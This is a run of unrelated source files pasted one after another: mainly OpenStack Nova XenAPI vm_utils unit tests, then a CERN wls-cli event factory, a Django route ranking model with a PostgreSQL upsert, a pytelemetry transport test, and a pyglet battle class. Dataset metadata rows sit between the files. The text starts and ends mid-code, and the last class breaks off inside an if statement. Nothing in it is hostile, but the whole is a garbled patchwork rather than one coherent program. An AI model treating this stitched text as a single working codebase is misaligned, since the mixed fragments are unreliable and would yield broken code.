{'uuid': 'sr_uuid', 'type': 'ext'})
self.mox.ReplayAll()
self.assertEqual(vm_utils.get_sr_path(self.session),
"/var/run/sr-mount/sr_uuid")
class CreateKernelRamdiskTestCase(VMUtilsTestBase):
def setUp(self):
super(CreateKernelRamdiskTestCase, self).setUp()
self.context = "context"
self.session = FakeSession()
self.instance = {"kernel_id": None, "ramdisk_id": None}
self.name_label = "name"
self.mox.StubOutWithMock(self.session, "call_plugin")
self.mox.StubOutWithMock(uuid, "uuid4")
self.mox.StubOutWithMock(vm_utils, "_fetch_disk_image")
def test_create_kernel_and_ramdisk_no_create(self):
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual((None, None), result)
def test_create_kernel_and_ramdisk_create_both_cached(self):
kernel_id = "kernel"
ramdisk_id = "ramdisk"
self.instance["kernel_id"] = kernel_id
self.instance["ramdisk_id"] = ramdisk_id
args_kernel = {}
args_kernel['cached-image'] = kernel_id
args_kernel['new-image-uuid'] = "fake_uuid1"
uuid.uuid4().AndReturn("fake_uuid1")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_kernel).AndReturn("k")
args_ramdisk = {}
args_ramdisk['cached-image'] = ramdisk_id
args_ramdisk['new-image-uuid'] = "fake_uuid2"
uuid.uuid4().AndReturn("fake_uuid2")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_ramdisk).AndReturn("r")
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual(("k", "r"), result)
def test_create_kernel_and_ramdisk_create_kernel_not_cached(self):
kernel_id = "kernel"
self.instance["kernel_id"] = kernel_id
args_kernel = {}
args_kernel['cached-image'] = kernel_id
args_kernel['new-image-uuid'] = "fake_uuid1"
uuid.uuid4().AndReturn("fake_uuid1")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_kernel).AndReturn("")
kernel = {"kernel": {"file": "k"}}
vm_utils._fetch_disk_image(self.context, self.session, self.instance,
self.name_label, kernel_id, 0).AndReturn(kernel)
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual(("k", None), result)
class ScanSrTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, "_scan_sr")
@mock.patch.object(vm_utils, "safe_find_sr")
def test_scan_default_sr(self, mock_safe_find_sr, mock_scan_sr):
mock_safe_find_sr.return_value = "sr_ref"
self.assertEqual("sr_ref", vm_utils.scan_default_sr("fake_session"))
mock_scan_sr.assert_called_once_with("fake_session", "sr_ref")
def test_scan_sr_works(self):
session = mock.Mock()
vm_utils._scan_sr(session, "sr_ref")
session.call_xenapi.assert_called_once_with('SR.scan', "sr_ref")
def test_scan_sr_unknown_error_fails_once(self):
session = mock.Mock()
session.call_xenapi.side_effect = test.TestingException
self.assertRaises(test.TestingException,
vm_utils._scan_sr, session, "sr_ref")
session.call_xenapi.assert_called_once_with('SR.scan', "sr_ref")
@mock.patch.object(greenthread, 'sleep')
def test_scan_sr_known_error_retries_then_throws(self, mock_sleep):
session = mock.Mock()
class FakeException(Exception):
details = ['SR_BACKEND_FAILURE_40', "", "", ""]
session.XenAPI.Failure = FakeException
session.call_xenapi.side_effect = FakeException
self.assertRaises(FakeException,
vm_utils._scan_sr, session, "sr_ref")
session.call_xenapi.assert_called_with('SR.scan', "sr_ref")
self.assertEqual(4, session.call_xenapi.call_count)
mock_sleep.assert_has_calls([mock.call(2), mock.call(4), mock.call(8)])
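        # The sleep arguments show the exponential backoff between SR.scan
        # retries: 2s, 4s and 8s before the fourth attempt finally propagates.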
@mock.patch.object(greenthread, 'sleep')
def test_scan_sr_known_error_retries_then_succeeds(self, mock_sleep):
session = mock.Mock()
class FakeException(Exception):
details = ['SR_BACKEND_FAILURE_40', "", "", ""]
session.XenAPI.Failure = FakeException
sr_scan_call_count = 0
def fake_call_xenapi(*args):
fake_call_xenapi.count += 1
if fake_call_xenapi.count != 2:
raise FakeException()
fake_call_xenapi.count = 0
session.call_xenapi.side_effect = fake_call_xenapi
vm_utils._scan_sr(session, "sr_ref")
session.call_xenapi.assert_called_with('SR.scan', "sr_ref")
self.assertEqual(2, session.call_xenapi.call_count)
mock_sleep.assert_called_once_with(2)
@mock.patch.object(flavors, 'extract_flavor',
return_value={
'memory_mb': 1024,
'vcpus': 1,
'vcpu_weight': 1.0,
})
class CreateVmTestCase(VMUtilsTestBase):
def test_vss_provider(self, mock_extract):
self.flags(vcpu_pin_set="2,3")
session = mock.Mock()
instance = {
"uuid": "uuid",
}
vm_utils.create_vm(session, instance, "label",
"kernel", "ramdisk")
vm_rec = {
'VCPUs_params': {'cap': '0', 'mask': '2,3', 'weight': '1.0'},
'PV_args': '',
'memory_static_min': '0',
'ha_restart_priority': '',
'HVM_boot_policy': 'BIOS order',
'PV_bootloader': '', 'tags': [],
'VCPUs_max': '1',
'memory_static_max': '1073741824',
'actions_after_shutdown': 'destroy',
'memory_dynamic_max': '1073741824',
'user_version': '0',
'xenstore_data': {'vm-data/allowvssprovider': 'false'},
'blocked_operations': {},
'is_a_template': False,
'name_description': '',
'memory_dynamic_min': '1073741824',
'actions_after_crash': 'destroy',
'memory_target': '1073741824',
'PV_ramdisk': '',
'PV_bootloader_args': '',
'PCI_bus': '',
'other_config': {'nova_uuid': 'uuid'},
'name_label': 'label',
'actions_after_reboot': 'restart',
'VCPUs_at_startup': '1',
'HVM_boot_params': {'order': 'dc'},
'platform': {'nx': 'true', 'pae': 'true', 'apic': 'true',
'timeoffset': '0', 'viridian': 'true',
'acpi': 'true'},
'PV_legacy_args': '',
'PV_kernel': '',
'affinity': '',
'recommendations': '',
'ha_always_run': False
}
session.call_xenapi.assert_called_once_with("VM.create", vm_rec)
def test_invalid_cpu_mask_raises(self, mock_extract):
self.flags(vcpu_pin_set="asdf")
session = mock.Mock()
instance = {
"uuid": "uuid",
}
self.assertRaises(exception.Invalid,
vm_utils.create_vm,
session, instance, "label",
"kernel", "ramdisk")
class DetermineVmModeTestCase(VMUtilsTestBase):
def test_determine_vm_mode_returns_xen_mode(self):
instance = {"vm_mode": "xen"}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_mode(self):
instance = {"vm_mode": "hvm"}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_xen_for_linux(self):
instance = {"vm_mode": None, "os_type": "linux"}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_for_windows(self):
instance = {"vm_mode": None, "os_type": "windows"}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_by_default(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_xen_for_VHD(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, vm_utils.ImageType.DISK_VHD))
def test_determine_vm_mode_returns_xen_for_DISK(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, vm_utils.ImageType.DISK))
class CallXenAPIHelpersTestCase(VMUtilsTestBase):
def test_vm_get_vbd_refs(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vm_get_vbd_refs(session, "vm_ref"))
session.call_xenapi.assert_called_once_with("VM.get_VBDs", "vm_ref")
def test_vbd_get_rec(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vbd_get_rec(session, "vbd_ref"))
session.call_xenapi.assert_called_once_with("VBD.get_record",
"vbd_ref")
def test_vdi_get_rec(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vdi_get_rec(session, "vdi_ref"))
session.call_xenapi.assert_called_once_with("VDI.get_record",
"vdi_ref")
def test_vdi_snapshot(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vdi_snapshot(session, "vdi_ref"))
session.call_xenapi.assert_called_once_with("VDI.snapshot",
"vdi_ref", {})
def test_vdi_get_virtual_size(self):
session = mock.Mock()
session.call_xenapi.return_value = "123"
self.assertEqual(123, vm_utils._vdi_get_virtual_size(session, "ref"))
session.call_xenapi.assert_called_once_with("VDI.get_virtual_size",
"ref")
@mock.patch.object(vm_utils, '_get_resize_func_name')
def test_vdi_resize(self, mock_get_resize_func_name):
session = mock.Mock()
mock_get_resize_func_name.return_value = "VDI.fake"
vm_utils._vdi_resize(session, "ref", 123)
session.call_xenapi.assert_called_once_with("VDI.fake", "ref", "123")
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_works(self, mock_get_size, mock_resize):
mock_get_size.return_value = (1024 ** 3) - 1
instance = {"uuid": "a"}
vm_utils.update_vdi_virtual_size("s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
mock_resize.assert_called_once_with("s", "ref", 1024 ** 3)
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_skips_resize_down(self, mock_get_size,
mock_resize):
mock_get_size.return_value = 1024 ** 3
instance = {"uuid": "a"}
vm_utils.update_vdi_virtual_size("s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_raise_if_disk_big(self, mock_get_size,
mock_resize):
mock_get_size.return_value = 1024 ** 3 + 1
instance = {"uuid": "a"}
self.assertRaises(exception.ResizeError,
vm_utils.update_vdi_virtual_size,
"s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, '_vdi_get_rec')
@mock.patch.object(vm_utils, '_vbd_get_rec')
@mock.patch.object(vm_utils, '_vm_get_vbd_refs')
class GetVdiForVMTestCase(VMUtilsTestBase):
def test_get_vdi_for_vm_safely(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_rec):
session = "session"
vm_get_vbd_refs.return_value = ["a", "b"]
vbd_get_rec.return_value = {'userdevice': '0', 'VDI': 'vdi_ref'}
vdi_get_rec.return_value = {}
result = vm_utils.get_vdi_for_vm_safely(session, "vm_ref")
self.assertEqual(('vdi_ref', {}), result)
vm_get_vbd_refs.assert_called_once_with(session, "vm_ref")
vbd_get_rec.assert_called_once_with(session, "a")
vdi_get_rec.assert_called_once_with(session, "vdi_ref")
def test_get_vdi_for_vm_safely_fails(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_rec):
session = "session"
vm_get_vbd_refs.return_value = ["a", "b"]
vbd_get_rec.return_value = {'userdevice': '0', 'VDI': 'vdi_ref'}
self.assertRaises(exception.NovaException,
vm_utils.get_vdi_for_vm_safely,
session, "vm_ref", userdevice='1')
self.assertEqual([], vdi_get_rec.call_args_list)
self.assertEqual(2, len(vbd_get_rec.call_args_list))
@mock.patch.object(vm_utils, '_vdi_get_uuid')
@mock.patch.object(vm_utils, '_vbd_get_rec')
@mock.patch.object(vm_utils, '_vm_get_vbd_refs')
class GetAllVdiForVMTestCase(VMUtilsTestBase):
def _setup_get_all_vdi_uuids_for_vm(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
def fake_vbd_get_rec(session, vbd_ref):
return {'userdevice': vbd_ref, 'VDI': "vdi_ref_%s" % vbd_ref}
def fake_vdi_get_uuid(session, vdi_ref):
return vdi_ref
vm_get_vbd_refs.return_value = ["0", "2"]
vbd_get_rec.side_effect = fake_vbd_get_rec
vdi_get_uuid.side_effect = fake_vdi_get_uuid
def test_get_all_vdi_uuids_for_vm_works(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
self._setup_get_all_vdi_uuids_for_vm(vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid)
result = vm_utils.get_all_vdi_uuids_for_vm('session', "vm_ref")
expected = ['vdi_ref_0', 'vdi_ref_2']
self.assertEqual(expected, list(result))
def test_get_all_vdi_uuids_for_vm_finds_none(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
self._setup_get_all_vdi_uuids_for_vm(vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid)
result = vm_utils.get_all_vdi_uuids_for_vm('session', "vm_ref",
min_userdevice=1)
expected = ["vdi_ref_2"]
self.assertEqual(expected, list(result))
class GetAllVdisTestCase(VMUtilsTestBase):
def test_get_all_vdis_in_sr(self):
def fake_get_rec(record_type, ref):
if ref == "2":
return "vdi_rec_2"
session = mock.Mock()
session.call_xenapi.return_value = ["1", "2"]
session.get_rec.side_effect = fake_get_rec
sr_ref = "sr_ref"
actual = list(vm_utils._get_all_vdis_in_sr(session, sr_ref))
self.assertEqual(actual, [('2', 'vdi_rec_2')])
session.call_xenapi.assert_called_once_with("SR.get_VDIs", sr_ref)
class SnapshotAttachedHereTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, '_snapshot_attached_here_impl')
def test_snapshot_attached_here(self, mock_impl):
def fake_impl(session, instance, vm_ref, label, userdevice,
post_snapshot_callback):
self.assertEqual("session", session)
self.assertEqual("instance", instance)
self.assertEqual("vm_ref", vm_ref)
self.assertEqual("label", label)
self.assertEqual('0', userdevice)
self.assertIsNone(post_snapshot_callback)
yield "fake"
mock_impl.side_effect = fake_impl
with vm_utils.snapshot_attached_here("session", "instance", "vm_ref",
"label") as result:
self.assertEqual("fake", result)
mock_impl.assert_called_once_with("session", "instance", "vm_ref",
"label", '0', None)
@mock.patch.object(vm_utils, 'safe_destroy_vdis')
@mock.patch.object(vm_utils, '_walk_vdi_chain')
@mock.patch.object(vm_utils, '_wait_for_vhd_coalesce')
@mock.patch.object(vm_utils, '_vdi_get_uuid')
@mock.patch.object(vm_utils, '_vdi_snapshot')
@mock.patch.object(vm_utils, '_get_vhd_parent_uuid')
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
def test_snapshot_attached_here_impl(self, mock_get_vdi_for_vm_safely,
mock_get_vhd_parent_uuid, mock_vdi_snapshot, mock_vdi_get_uuid,
mock_wait_for_vhd_coalesce, mock_walk_vdi_chain,
mock_safe_destroy_vdis):
session = "session"
instance = {"uuid": "uuid"}
mock_callback = mock.Mock()
mock_get_vdi_for_vm_safely.return_value = ("vdi_ref",
{"SR": "sr_ref"})
mock_get_vhd_parent_uuid.return_value = "original_uuid"
mock_vdi_snapshot.return_value = "snap_ref"
mock_vdi_get_uuid.return_value = "snap_uuid"
mock_walk_vdi_chain.return_value = [{"uuid": "a"}, {"uuid": "b"}]
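        # Raising inside the context manager verifies that cleanup still
        # happens: safe_destroy_vdis must be called on the snapshot even
        # though the body failed.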
try:
with vm_utils.snapshot_attached_here(session, instance, "vm_ref",
"label", '2', mock_callback) as result:
self.assertEqual(["a", "b"], result)
raise test.TestingException()
self.assertTrue(False)
except test.TestingException:
pass
mock_get_vdi_for_vm_safely.assert_called_once_with(session, "vm_ref",
'2')
mock_get_vhd_parent_uuid.assert_called_once_with(session, "vdi_ref")
mock_vdi_snapshot.assert_called_once_with(session, "vdi_ref")
mock_wait_for_vhd_coalesce.assert_called_once_with(session, instance,
"sr_ref", "vdi_ref", "original_uuid")
mock_vdi_get_uuid.assert_called_once_with(session, "snap_ref")
mock_walk_vdi_chain.assert_called_once_with(session, "snap_uuid")
mock_callback.assert_called_once_with(
task_state="image_pending_upload")
mock_safe_destroy_vdis.assert_called_once_with(session, ["snap_ref"])
class ImportMigratedDisksTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, '_import_migrate_ephemeral_disks')
@mock.patch.object(vm_utils, '_import_migrated_root_disk')
def test_import_all_migrated_disks(self, mock_root, mock_ephemeral):
session = "session"
instance = "instance"
mock_root.return_value = "root_vdi"
mock_ephemeral.return_value = ["a", "b"]
result = vm_utils.import_all_migrated_disks(session, instance)
expected = {'root': 'root_vdi', 'ephemerals': ["a", "b"]}
self.assertEqual(expected, result)
mock_root.assert_called_once_with(session, instance)
mock_ephemeral.assert_called_once_with(session, instance)
@mock.patch.object(vm_utils, '_import_migrated_vhds')
def test_import_migrated_root_disk(self, mock_migrate):
mock_migrate.return_value = "foo"
instance = {"uuid": "uuid", "name": "name"}
result = vm_utils._import_migrated_root_disk("s", instance)
self.assertEqual("foo", result)
mock_migrate.assert_called_once_with("s", instance, "uuid", "root",
"name")
@mock.patch.object(vm_utils, '_import_migrated_vhds')
def test_import_migrate_ephemeral_disks(self, mock_migrate):
mock_migrate.return_value = "foo"
instance = {"uuid": "uuid", "name": "name", "ephemeral_gb": 4000}
result = vm_utils._import_migrate_ephemeral_disks("s", instance)
self.assertEqual({'4': 'foo', '5': 'foo'}, result)
expected_calls = [mock.call("s", instance, "uuid_ephemeral_1",
"ephemeral", "name ephemeral (1)"),
mock.call("s", instance, "uuid_ephemeral_2",
"ephemeral", "name ephemeral (2)")]
self.assertEqual(expected_calls, mock_migrate.call_args_list)
@mock.patch.object(vm_utils, '_set_vdi_info')
@mock.patch.object(vm_utils, 'scan_default_sr')
@mock.patch.object(vm_utils, 'get_sr_path')
def test_import_migrated_vhds(self, mock_get_sr_path, mock_scan_sr,
mock_set_info):
session = mock.Mock()
instance = {"uuid": "uuid"}
session.call_plugin_serialized.return_value = {"root": {"uuid": "a"}}
session.call_xenapi.return_value = "vdi_ref"
mock_get_sr_path.return_value = "sr_path"
result = vm_utils._import_migrated_vhds(session, instance,
'chain_label', 'disk_type', 'vdi_label')
expected = {'uuid': "a", 'ref': "vdi_ref"}
self.assertEqual(expected, result)
mock_get_sr_path.assert_called_once_with(session)
session.call_plugin_serialized.assert_called_once_with('migration',
'move_vhds_into_sr', instance_uuid='chain_label',
sr_path='sr_path', uuid_stack=mock.ANY)
mock_scan_sr.assert_called_once_with(session)
session.call_xenapi.assert_called_once_with('VDI.get_by_uuid', 'a')
mock_set_info.assert_called_once_with(session, 'vdi_ref', 'disk_type',
'vdi_label', 'disk_type', instance)
class MigrateVHDTestCase(VMUtilsTestBase):
def _assert_transfer_called(self, session, label):
session.call_plugin_serialized.assert_called_once_with(
'migration', 'transfer_vhd', instance_uuid=label, host="dest",
vdi_uuid="vdi_uuid", sr_path="sr_path", seq_num=2)
def test_migrate_vhd_root(self):
session = mock.Mock()
instance = {"uuid": "a"}
vm_utils.migrate_vhd(session, instance, "vdi_uuid", "dest",
"sr_path", 2)
self._assert_transfer_called(session, "a")
def test_migrate_vhd_ephemeral(self):
session = mock.Mock()
instance = {"uuid": "a"}
vm_utils.migrate_vhd(session, instance, "vdi_uuid", "dest",
"sr_path", 2, 2)
self._assert_transfer_called(session, "a_ephemeral_2")
def test_migrate_vhd_converts_exceptions(self):
session = mock.Mock()
session.XenAPI.Failure = test.TestingException
session.call_plugin_serialized.side_effect = test.TestingException()
instance = {"uuid": "a"}
self.assertRaises(exception.MigrationError, vm_utils.migrate_vhd,
session, instance, "vdi_uuid", "dest", "sr_path", 2)
self._assert_transfer_called(session, "a")
class StripBaseMirrorTestCase(VMUtilsTestBase):
def test_strip_base_mirror_from_vdi_works(self):
session = mock.Mock()
vm_utils._try_strip_base_mirror_from_vdi(session, "vdi_ref")
session.call_xenapi.assert_called_once_with(
"VDI.remove_from_sm_config", "vdi_ref", "base_mirror")
def test_strip_base_mirror_from_vdi_hides_error(self):
session = mock.Mock()
session.XenAPI.Failure = test.TestingException
session.call_xenapi.side_effect = test.TestingException()
vm_utils._try_strip_base_mirror_from_vdi(session, "vdi_ref")
session.call_xenapi.assert_called_once_with(
"VDI.remove_from_sm_config", "vdi_ref", "base_mirror")
@mock.patch.object(vm_utils, '_try_strip_base_mirror_from_vdi')
def test_strip_base_mirror_from_vdis(self, mock_strip):
session = mock.Mock()
session.call_xenapi.return_value = {"VDI": "ref", "foo": "bar"}
vm_utils.strip_base_mirror_from_vdis(session, "vm_ref")
expected = [mock.call('VM.get_VBDs', "vm_ref"),
mock.call('VBD.get_record', "VDI"),
mock.call('VBD.get_record', "foo")]
self.assertEqual(expected, session.call_xenapi.call_args_list)
expected = [mock.call(session, "ref"), mock.call(session, "ref")]
self.assertEqual(expected, mock_strip.call_args_list)
class DeviceIdTestCase(VMUtilsTestBase):
def test_device_id_is_none_if_not_specified_in_meta_data(self):
image_meta = {}
session = mock.Mock()
session.product_version = (6, 1, 0)
self.assertIsNone(vm_utils.get_vm_device_id(session, image_meta))
def test_get_device_id_if_hypervisor_version_is_greater_than_6_1(self):
image_meta = {'xenapi_device_id': '0002'}
session = mock.Mock()
session.product_version = (6, 2, 0)
self.assertEqual('0002',
vm_utils.get_vm_device_id(session, image_meta))
session.product_version = (6, 3, 1)
self.assertEqual('0002',
vm_utils.get_vm_device_id(session, image_meta))
def test_raise_exception_if_device_id_not_supported_by_hyp_version(self):
image_meta = {'xenapi_device_id': '0002'}
session = mock.Mock()
session.product_version = (6, 0)
exc = self.assertRaises(exception.NovaException,
vm_utils.get_vm_device_id, session, image_meta)
self.assertEqual("Device id 0002 specified is not supported by "
"hypervisor version (6, 0)", exc.message)
session.product_version = ('6a')
exc = self.assertRaises(exception.NovaException,
vm_utils.get_vm_device_id, session, image_meta)
self.assertEqual("Device id 0002 specified is not supported by "
"hypervisor version 6a", exc.message)
class CreateVmRecordTestCase(VMUtilsTestBase):
@mock.patch.object(flavors, 'extract_flavor')
def test_create_vm_record(self, mock_extract_flavor):
session = mock.Mock()
instance = {"uuid": "uuid123"}
flavor = {"memory_mb": 1024, "vcpus": 1, "vcpu_weight": 2}
mock_extract_flavor.return_value = flavor
vm_utils.create_vm(session, instance, "name", "kernel", "ramdisk",
device_id="0002")
expected_vm_rec = {
'VCPUs_params': {'cap': '0', 'weight': '2'},
'PV_args': '',
'memory_static_min': '0',
'ha_restart_priority': '',
'HVM_boot_policy': 'BIOS order',
'PV_bootloader': '',
'tags': [],
'VCPUs_max': '1',
'memory_static_max': '1073741824',
'actions_after_shutdown': 'destroy',
'memory_dynamic_max': '1073741824',
'user_version': '0',
'xenstore_data': {'vm-data/allowvssprovider': 'false'},
'blocked_operations': {},
'is_a_template': False,
'name_description': '',
'memory_dynamic_min': '1073741824',
'actions_after_crash': 'destroy',
'memory_target': '1073741824',
'PV_ramdisk': '',
'PV_bootloader_args': '',
'PCI_bus': '',
'other_config': {'nova_uuid': 'uuid123'},
'name_label': 'name',
'actions_after_reboot': 'restart',
'VCPUs_at_startup': '1',
'HVM_boot_params': {'order': 'dc'},
'platform': {'nx': 'true', 'pae': 'true', 'apic': 'true',
'timeoffset': '0', 'viridian': 'true', 'acpi': 'true',
'device_id': '0002'},
'PV_legacy_args': '',
'PV_kernel': '',
'affinity': '',
'recommendations': '',
'ha_always_run': False}
session.call_xenapi.assert_called_with('VM.create', expected_vm_rec)
class ResizeFunctionTestCase(test.NoDBTestCase):
def _call_get_resize_func_name(self, brand, version):
session = mock.Mock()
session.product_brand = brand
session.product_version = version
return vm_utils._get_resize_func_name(session)
def _test_is_resize(self, brand, version):
result = self._call_get_resize_func_name(brand, version)
self.assertEqual("VDI.resize", result)
def _test_is_resize_online(self, brand, version):
result = self._call_get_resize_func_name(brand, version)
self.assertEqual("VDI.resize_online", result)
def test_xenserver_5_5(self):
self._test_is_resize_online("XenServer", (5, 5, 0))
def test_xenserver_6_0(self):
self._test_is_resize("XenServer", (6, 0, 0))
def test_xcp_1_1(self):
self._test_is_resize_online("XCP", (1, 1, 0))
def test_xcp_1_2(self):
self._test_is_resize("XCP", (1, 2, 0))
def test_xcp_2_0(self):
self._test_is_resize("XCP", (2, 0, 0))
def test_random_brand(self):
self._test_is_resize("asfd", (1, 1, 0))
def test_default(self):
self._test_is_resize(None, None)
def test_empty(self):
self._test_is_resize("", "")
def test_bad_version(self):
self._test_is_resize("XenServer", "asdf")
| apache-2.0 | 1,005,295,833,943,286,300 | 38.167815 | 79 | 0.585018 | false |
cerndb/wls-cli | wls_rest/src/wlscli/common/event.py | 1 | 2248 | #!/usr/bin/env python
#*******************************************************************************
# Copyright (C) 2015, CERN
# This software is distributed under the terms of the GNU General Public
# License version 3 (GPL Version 3), copied verbatim in the file "LICENSE".
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as Intergovernmental Organization
# or submit itself to any jurisdiction.
#
#
#*******************************************************************************
'''
Created on Oct 31, 2015
@author: Konrad Kaczkowski
'''
from utils import Operation
class UserEvent(object):
pass
class ConsoleUIEvent(object):
def __init__(self, command):
''' Constructor '''
self.command = command
class AdminChangeEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class AppEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class DeploymentEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class LogsEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ServerEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ShowEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class EventFactory(object):
types = { Operation.Server: ServerEvent, Operation.App: AppEvent,
Operation.Deployment: DeploymentEvent, Operation.Logs: LogsEvent,
Operation.Show: ShowEvent, Operation.AdmChange: AdminChangeEvent}
def __new__(cls, operation):
return EventFactory.types[type(operation)](operation)
| gpl-3.0 | 7,370,498,741,496,446,000 | 30.608696 | 80 | 0.581851 | false |
katharosada/bus-shaming | busshaming/models/route_ranking.py | 1 | 1414 | import uuid
from django.db import connection, models
from busshaming.enums import RouteMetric, MetricTimespan
UPSERT_ENTRY = '''
INSERT INTO busshaming_routeranking (id, route_id, date, timespan, metric, rank, display_rank, value)
VALUES (uuid_generate_v4(), %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (date, timespan, metric, rank)
DO UPDATE
SET route_id = EXCLUDED.route_id,
display_rank = EXCLUDED.display_rank,
value = EXCLUDED.value
'''
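# Note: the statement above is PostgreSQL-specific. ON CONFLICT ... DO UPDATE
# requires PostgreSQL 9.5+, and uuid_generate_v4() is provided by the
# "uuid-ossp" extension, which must be installed in the target database.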
class RouteRankingManager(models.Manager):
def upsert(self, route_id, date, timespan, metric, rank, display_rank, value):
with connection.cursor() as cursor:
cursor.execute(UPSERT_ENTRY, (route_id, date, timespan, metric, rank, display_rank, value))
class RouteRanking(models.Model):
"""Denormalization of top N of each different kind of ranking."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
route = models.ForeignKey('Route')
date = models.DateField(db_index=True)
timespan = models.PositiveSmallIntegerField(choices=MetricTimespan.choices())
metric = models.PositiveSmallIntegerField(choices=RouteMetric.choices())
rank = models.PositiveSmallIntegerField()
display_rank = models.PositiveSmallIntegerField()
value = models.FloatField()
class Meta:
index_together = (('date', 'timespan', 'metric'),)
unique_together = (('date', 'timespan', 'metric', 'rank'),)
| mit | -8,858,094,445,648,581,000 | 36.210526 | 103 | 0.706506 | false |
Overdrivr/pytelemetry | pytelemetry/test/test_typing.py | 1 | 1747 | from pytelemetry import Pytelemetry
import queue
import pytest
import unittest.mock as mock
class transportMock:
def __init__(self):
self.queue = queue.Queue()
def read(self, maxbytes=1):
data = []
amount = 0
while amount < maxbytes and not self.queue.empty():
c = self.queue.get()
data.append(c)
amount += 1
return data
def readable(self):
return self.queue.qsize()
def write(self, data):
for i in range(len(data)):
self.queue.put(data[i])
return 0
def writeable(self):
return not self.queue.full()
def test_wrong_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(Exception) as excinfo:
c.publish('sometopic',12,'string')
# TODO : Assert exception
assert t.queue.qsize() == 0
def test_unexisting_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(IndexError):
c.publish('sometopic',12,'int323')
assert t.queue.qsize() == 0
def test_hardcoded():
t = transportMock()
c = Pytelemetry(t)
cb = mock.Mock(spec=["topic","data"])
c.subscribe('sometopic ',cb)
# Apply hardcoded frame directly generated by the c library
# SOF head sometopic..................................... eol 12457........ crc..... eof
t.write([247, 6, 0, 115, 111, 109, 101, 116, 111, 112, 105, 99, 32, 0, 169, 48, 0, 0, 111, 249, 127])
c.update()
assert t.queue.qsize() == 0
cb.assert_called_once_with('sometopic ',12457, None)
# TODO : Check what happens is string is non null terminated
# TODO : Check what happens if there are spaces in name
# TODO Check wrong crc
| mit | -6,212,126,936,606,328,000 | 25.876923 | 105 | 0.588437 | false |
MikeHoffert/caladbolg-engine | caladbolg/agents/battle.py | 1 | 1210 | import pyglet
from caladbolg.graphics import graphics_context
class ScriptedBattle:
def __init__(self, background_image, monsters, party):
self.background_image = background_image
self.monsters = monsters
self.party = party
def start_battle(self):
image = pyglet.image.load(self.background_image)
background_sprite = pyglet.sprite.Sprite(image)
# Figure out if we need to scale the background image for the user's screen
sprite_width = background_sprite.width
sprite_height = background_sprite.height
screen_width = graphics_context.screen_width
screen_height = graphics_context.screen_height
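        # Scaling rule implemented below (inferred from the code): if the background
        # is smaller than the screen in either dimension, rescale by the smaller
        # screen/sprite ratio; if it is larger in both, rescale by the larger ratio.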
scale_factor = 1
if sprite_width < screen_width or sprite_height < screen_height:
scale_factor = min(screen_width / sprite_width, screen_height / sprite_height)
elif sprite_width > screen_width and sprite_height > screen_height:
